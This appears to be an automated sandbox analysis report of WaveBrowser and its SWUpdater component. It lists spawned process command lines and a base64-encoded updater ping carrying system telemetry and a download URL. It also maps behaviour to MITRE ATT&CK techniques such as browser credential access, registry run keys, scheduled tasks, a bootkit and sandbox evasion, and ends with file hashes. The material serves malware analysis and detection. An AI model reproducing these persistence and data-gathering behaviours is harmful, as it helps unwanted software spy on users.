PID:7468
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6644,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3924 /prefetch:85⤵PID:6864
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --field-trial-handle=5264,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8644 /prefetch:25⤵
- Checks computer location settings
PID:8032
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8272,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8620 /prefetch:85⤵PID:6640
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --field-trial-handle=7472,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9764 /prefetch:15⤵
- Checks computer location settings
PID:7472
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --field-trial-handle=9572,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7980 /prefetch:25⤵
- Checks computer location settings
PID:7408
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --field-trial-handle=9548,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5748 /prefetch:25⤵
- Checks computer location settings
PID:7304
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --field-trial-handle=11592,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7532 /prefetch:25⤵
- Checks computer location settings
PID:6980
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --field-trial-handle=11580,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9248 /prefetch:15⤵
- Checks computer location settings
PID:6024
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --field-trial-handle=11680,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6060 /prefetch:25⤵
- Checks computer location settings
PID:7264
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6180,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6076 /prefetch:85⤵PID:7636
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8468,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9432 /prefetch:85⤵PID:7596
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8600,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11168 /prefetch:85⤵PID:3760
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7740,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5688 /prefetch:85⤵PID:8064
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=11000,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6564 /prefetch:85⤵PID:6992
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5272,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8788 /prefetch:85⤵PID:4772
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6532,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6628 /prefetch:85⤵PID:7784
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7908,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8648 /prefetch:85⤵PID:1568
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5524,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7332 /prefetch:85⤵PID:3548
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --field-trial-handle=7704,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10312 /prefetch:25⤵
- Checks computer location settings
PID:6636
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12168,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7244 /prefetch:85⤵PID:1604
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --field-trial-handle=5756,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10348 /prefetch:25⤵
- Checks computer location settings
PID:1928
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=11424,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8664 /prefetch:85⤵PID:7888
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --field-trial-handle=7588,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10536 /prefetch:25⤵
- Checks computer location settings
PID:4632
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6916,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7164 /prefetch:85⤵PID:8792
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10508,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10460 /prefetch:85⤵PID:5820
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --start-stack-profiler --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=10044,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7648 /prefetch:85⤵PID:8216
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7160,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5644 /prefetch:85⤵PID:5920
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1220,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7508 /prefetch:85⤵PID:1540
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=119 --field-trial-handle=1216,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3236 /prefetch:25⤵
- Checks computer location settings
PID:5864
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8648,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11400 /prefetch:85⤵PID:8320
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=121 --field-trial-handle=472,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8064 /prefetch:25⤵
- Checks computer location settings
PID:8760
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10008,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10468 /prefetch:85⤵PID:3720
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6068,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5312 /prefetch:85⤵PID:948
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --field-trial-handle=5664,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4364 /prefetch:25⤵
- Checks computer location settings
PID:8408
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8064,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8232 /prefetch:85⤵PID:3104
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=126 --field-trial-handle=11648,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10372 /prefetch:25⤵
- Checks computer location settings
PID:2012
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7696,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10924 /prefetch:85⤵PID:1660
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10520,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10492 /prefetch:85⤵PID:8820
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8516,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=456 /prefetch:85⤵PID:5924
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=500,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10492 /prefetch:85⤵PID:5860
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=131 --field-trial-handle=11620,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10948 /prefetch:25⤵
- Checks computer location settings
PID:3260
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10500,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=496 /prefetch:85⤵PID:1816
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5644,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8708 /prefetch:85⤵PID:3888
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5640,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8612 /prefetch:85⤵PID:8052
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=135 --field-trial-handle=5668,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3452 /prefetch:25⤵
- Checks computer location settings
PID:8640
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8524,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9196 /prefetch:85⤵PID:8424
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7176,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10916 /prefetch:85⤵PID:9724
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7940,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10876 /prefetch:85⤵PID:1576
-
-
-
-
-
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJTV1VwZGF0ZXIiIHVwZGF0ZXJ2ZXJzaW9uPSIxLjMuMTM1LjAiIHNoZWxsX3ZlcnNpb249IjEuMy4xMzUuMCIgaXNtYWNoaW5lPSIwIiBzZXNzaW9uaWQ9IntBNTI2OTY3My05MDM3LTQ2QTYtQjg3Ni0wMzYwNjcwNDNCMTJ9IiB1c2VyaWQ9InszZmE1NjQ1Mi05ZmZmLTQ1YWUtODQzMS0wNjc3NTI4MWQwZWJ9IiBpbnN0YWxsc291cmNlPSJvdGhlcmluc3RhbGxjbWQiIHJlcXVlc3RpZD0ie0ZDMDMxQkM4LUExQTItNDNBNS05ODRGLTZEQzBCODg1Q0Y2MX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7RUIxNDlBRDItQ0U0RS00RjUxLUI3RkMtQTE0OUZBQTRDQ0FGfSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMS41LjE4LjIiIGxhbmc9ImVuIiBicmFuZD0iIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iLTEiIGluc3RhbGxkYXRlPSItMSI-PGV2ZW50IGV2ZW50dHlwZT0iOSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHBzOi8vY2RuLnN3dXBkYXRlci5jb20vYnVpbGQvV2F2ZUJyb3dzZXIvc3RhYmxlL3dpbi8xMTIwOTg3NjQzOTA2LzY0L1dhdmVJbnN0YWxsZXItdjEuNS4xOC4yLmV4ZSIgZG93bmxvYWRlZD0iMTA2ODExMDgwIiB0b3RhbD0iMTA2ODExMDgwIiBkb3dubG9hZF90aW1lX21zPSIxMTgzNyIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI2IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc291cmNlX3VybF9pbmRleD0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjcwMSIgZG93bmxvYWRfdGltZV9tcz0iMTI4NTEiIGRvd25sb2FkZWQ9IjEwNjgxMTA4MCIgdG90YWw9IjEwNjgxMTA4MCIgaW5zdGFsbF90aW1lX21zPSIxNDIwOCIvPjwvYXBwPjwvcmVxdWVzdD42⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:6964
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:6480
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3760
-
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /c1⤵
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
PID:5916 -
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /cr2⤵
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
PID:7528
-
-
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /ua /installsource core2⤵
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
PID:180
-
-
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /ua /installsource scheduler1⤵
- Checks computer location settings
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
PID:5896 -
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /registermsihelper2⤵
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
PID:8860
-
-
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" -Embedding1⤵
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
PID:3700
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:1008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:8700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:5764
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Component Object Model Hijacking
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Modify Registry
1Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
4Credentials In Files
4Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Query Registry
10System Information Discovery
8System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
108KB
MD5b282ce9b81f606d1c6cbda554dcd4efa
SHA17554ca07096a2e410f2cd3c98beb7b7e6be27f3a
SHA2561893941e9dd1ca1296e7f575a9442fa1cc53dfeaf2d1bc94d01608ba9e7e31bb
SHA5129e71f3cb4ea67831dbee5bb4cbb2dbd9f8ff8ffd1158fe2fcac41c89169a9aa3236c8d163f7d4e9df5e2b70ba2be20fe3af97bef70be40f45dd11acb5b4bc184
-
Filesize
97KB
MD5c209d2a5f427b8dbd6ec71d6e57c7e61
SHA18340f5b41fb70e01791f1c1518d0308084b2dd63
SHA25676a54d6c150e7f38a08032a260eb5396c8df89ce9cef27f99a2a2bdf23d9f381
SHA512b2f24a876ed8749642ad353a2b32168f7d5fdfbf0acf78aa39bc4615a96016350f92406e8a657d289bc448a62e0acfdc57004595ef945bcc5b813d1a67d32f89
-
Filesize
97KB
MD506dd62361bae24f8dac385c07c162b69
SHA1ee385799aec954fe9fc3de7c81f48e7d2dd7eb71
SHA2562700573511aa417faedc4767645ef3334f46e73195f164a960c474717a3e0b0c
SHA51245d3c62f51f17231c561848da47ee2a9865130e98a38bab3afd4c048bcaf739ebd556922112f675b4635fb771331720bc971149168153800a6581ff20272d830
-
Filesize
259KB
MD513ed360db95682e27c69f74912f17140
SHA17519f2202e581defb7be93716d461470c1d91270
